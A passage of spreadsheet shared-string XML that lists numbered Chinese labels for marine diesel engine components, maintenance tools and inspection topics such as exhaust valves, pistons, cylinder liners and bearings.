    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1870-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1870-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1870-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭震减震器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1870-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器，工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1870-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1870-0600 AVD </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1872-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1872-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1872-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2240-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压单元</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2245-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸状况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2245-0200 Nim</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气口检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸磨损影响因素</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨粒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0125 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油速率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸状况报告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0135 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝水量计算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨合运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0145 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环外形</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2255-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套情况</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0700 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2265-0701 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀盘工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0210 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0220 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀移除工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0230 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀移除工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0240 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0245 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压阀杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0247 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0248 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞起吊工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0250 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0310 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0315 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖液压备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0321 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0330 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖支撑工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0350 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖起吊工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0350 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸盖起吊工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0430 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞引导工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0440 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0451 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0460 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞斜吊工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0470 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞支撑工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0480 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0491 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖安全阀拧紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套板上工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0610 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0620 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0630 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2270-0640 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0210 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0230 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀上部，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0240 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0320 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0320 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0400 - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0420 - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0500 - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-0600 - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2272-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>24×48</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯罩符号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>24</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2540-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2545-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2545-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承校中</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2555-0100</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承厚壁瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2555-0105</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承薄壁瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0125 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块和导板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0135 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0136 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损检测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0137 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
